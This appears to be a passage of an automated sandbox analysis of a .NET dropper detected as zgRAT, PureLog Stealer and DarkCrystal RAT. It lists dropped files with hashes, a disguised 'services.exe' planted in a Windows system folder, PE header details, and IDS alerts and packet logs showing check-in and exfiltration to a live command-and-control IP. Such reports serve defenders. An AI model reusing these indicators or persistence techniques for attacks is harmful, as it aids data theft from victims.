                                                              Entropy (8bit):5.699005826018714
                                                              Encrypted:false
                                                              SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                              MD5:87765D141228784AE91334BAE25AD743
                                                              SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                              SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                              SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\udTfrDlO.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33280
                                                              Entropy (8bit):5.634433516692816
                                                              Encrypted:false
                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\wSNFrCZa.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33280
                                                              Entropy (8bit):5.634433516692816
                                                              Encrypted:false
                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\wwvNdyqX.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):5.529329139831718
                                                              Encrypted:false
                                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\xLaDTRLB.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24576
                                                              Entropy (8bit):5.535426842040921
                                                              Encrypted:false
                                                              SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                              MD5:5420053AF2D273C456FB46C2CDD68F64
                                                              SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                              SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                              SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\yGSOdQVY.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):5.645950918301459
                                                              Encrypted:false
                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Windows\InputMethod\CHT\c5b4cb5e9653cc

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):5.387610697848139
                                                              Encrypted:false
                                                              SSDEEP:3:jThxr40xD8rjHQfs9KiXpspu7YN:H35SHHQfs9KiXpsAsN
                                                              MD5:2A32B576ED5403F831A0E45D7B744755
                                                              SHA1:0C52E2F7875B3F0653B5256522F54A8C9184F032
                                                              SHA-256:EDA524598EBCEADC44B5DCD495977A19EE9149A6387FDB7FA224FD918FAA1D78
                                                              SHA-512:C3D82F0BA21AB5B57E54B595F99029E49B1271F9F439B502E30E69579A6A3CF47265B75C6E24793DAFD9E53F842DFD82B243B5949337002A1ECCBB5157A819B6
                                                              Malicious:false
                                                              Preview:U30vXJVhgWZpcg6QQHA3yq4wuf7Mr5EDfZGLWwVlmQuYkTXEdPtKWvQn8EB2LI0lSWKDau3evZQh

                                                              C:\Windows\InputMethod\CHT\services.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

                                                              C:\Windows\InputMethod\CHT\services.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              \Device\Null

                                                              Download File
                                                              Process:C:\Windows\System32\PING.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):502
                                                              Entropy (8bit):4.609881103024484
                                                              Encrypted:false
                                                              SSDEEP:12:Pm5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:IdUOAokItULVDv
                                                              MD5:090721B3331E7B2CBC136B28C400B401
                                                              SHA1:D098C0F093F586DB6EA9A673B06070404A299A6B
                                                              SHA-256:24999BB5B73171AB47092A9F4E73C466DAF8F80EB4CFAFF2FED0016296301C60
                                                              SHA-512:20365BA8EDE22105BC90A908930F5F233020D59754B83AC42B31591DA36D1729138C5DD6D023E8C4C031711F0230754FA2AABED9759DD5B9D3A6B358544D0DC0
                                                              Malicious:false
                                                              Preview:..Pinging 835180 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):3.7593823756442295
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:XNPOazHpXF.exe
                                                              File size:10'393'088 bytes
                                                              MD5:adae028e0a5a72d219a02bb06d92241a
                                                              SHA1:7cae683f773d541bd5c76ce6491ccb2f2f05c08a
                                                              SHA256:3ac51e8fc3aa517aea4640efaffa1b04301c14dc876104e09ab9b7a3a95a0415
                                                              SHA512:fe8ef741de45a6bde2b48322ef33ee9662b0cbc4caabb582f405850cb0ab58d286e96c5e28e47a0968b17bae6874f938973d6ed7f27e6a9db3a16ed0b63aa1e6
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              TLSH:6DA6E006A9629A33C2567F349CE7102E83E0D6667533EF1B3A2F56917C172309B172B7
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@................................

                                                              File Icon

                                                              Icon Hash:00928e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x7b892e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3b88e00x4b.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ba0000x370.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3bc0000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x3b69340x3b6a005e0b68212aa49485af8080b41ece4a07unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x3ba0000x3700x4002cf46166977c39af7fde4d8438eccbc8False0.3779296875data2.867353130536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .reloc0x3bc0000xc0x200d03e96aaab1190e6e758e8c1c341af92False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x3ba0580x318data0.44823232323232326

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-21T10:47:25.908690+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.54971489.23.96.18080TCP
                                                              2024-12-21T10:47:46.710148+01002048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)1192.168.2.54977889.23.96.18080TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 21, 2024 10:47:24.359119892 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:24.480648994 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:24.480772972 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:24.543824911 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:24.663301945 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:24.934374094 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:25.053929090 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:25.857626915 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:25.908689976 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.133721113 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.133739948 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.133812904 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.216372967 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.310214996 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.336462021 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.429877996 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.430061102 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.430229902 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.549710989 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.568432093 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.676223040 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.689237118 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.721216917 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.783816099 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:26.903582096 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.903657913 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:26.903832912 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.035319090 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.080570936 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:27.209808111 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:27.329324007 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.565088987 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:27.668298960 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.684709072 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.684757948 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.721183062 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:27.807076931 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:27.861932993 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.033471107 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.041794062 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.080565929 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.189979076 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.207583904 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.209036112 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.209183931 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.327383995 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.327478886 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.328928947 CET804971489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.328991890 CET4971480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.329391956 CET804972189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.329449892 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.329447985 CET4972180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.449002981 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.674526930 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:28.794617891 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.794675112 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:28.794684887 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:29.704356909 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:29.893070936 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:29.937808990 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:29.939271927 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.060185909 CET804972489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:30.060240030 CET4972480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.116868973 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.236382961 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:30.237010956 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.237173080 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.357398987 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:30.596349955 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:30.715924025 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:30.715934992 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:30.716028929 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:31.619678974 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:31.689965010 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:31.857820034 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.080615044 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.226015091 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.226375103 CET4973780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.346075058 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.346086025 CET804973189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.346229076 CET4973180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.346494913 CET4973780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.346628904 CET4973780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.466506004 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.705791950 CET4973780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:32.825520992 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.825550079 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:32.825560093 CET804973789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:47:33.050261021 CET4974380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:47:33.120192051 CET4973780192.168.2.589.23.96.180
